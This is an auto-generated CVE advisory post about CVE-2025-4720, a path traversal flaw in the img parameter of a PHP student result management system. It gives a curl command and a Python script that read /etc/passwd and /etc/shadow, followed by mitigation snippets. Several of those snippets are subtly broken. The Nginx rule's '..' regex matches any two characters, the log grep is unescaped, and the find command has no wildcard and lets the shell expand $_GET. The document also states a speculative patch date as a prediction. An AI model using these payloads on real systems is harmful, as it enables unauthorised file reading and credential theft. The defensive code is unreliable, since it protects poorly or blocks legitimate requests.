Listen to this Post
How CVE-2025-4720 Works
The vulnerability exists in `academic/core/drop_student.php` due to improper sanitization of the `img` parameter, allowing attackers to perform path traversal. By manipulating this parameter, an attacker can access arbitrary files outside the intended directory, potentially leading to sensitive data exposure or server compromise. The flaw arises from insufficient validation of user-supplied input before using it in filesystem operations. Remote exploitation is possible without authentication, making this a critical security risk.
DailyCVE Form
Platform: SourceCodester Student Result Management
Version: 1.0
Vulnerability: Path Traversal
Severity: Critical
Date: 05/27/2025
Prediction: Patch expected by 06/15/2025
What Undercode Say:
Exploitation Commands
curl -X GET "http://target.com/academic/core/drop_student.php?img=../../../../etc/passwd"
import requests
url = "http://target.com/academic/core/drop_student.php"
params = {"img": "../../../../etc/shadow"}
response = requests.get(url, params=params)
print(response.text)
Protection Measures
1. Input Validation:
$img = basename($_GET['img']);
2. Web Server Restrictions:
<Directory /var/www/html/academic/core> php_admin_value open_basedir "/var/www/html" </Directory>
3. Patch Verification:
grep -r "basename" /var/www/html/academic/core/drop_student.php
Log Analysis
grep "drop_student.php" /var/log/apache2/access.log | grep -i "../"
Mitigation Script
if (strpos($_GET['img'], '..') !== false) {
die("Invalid file path!");
}
Debugging
error_log("Attempted path traversal: " . $_GET['img']);
Nginx Protection
location ~ /academic/core/drop_student.php {
if ($args ~ "..") { return 403; }
}
Automated Scanning
nikto -h http://target.com -id /academic/core/drop_student.php
Post-Exploitation Checks
find /var/www/html -type f -name ".php" -exec grep -l "$_GET['img']" {} \;
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
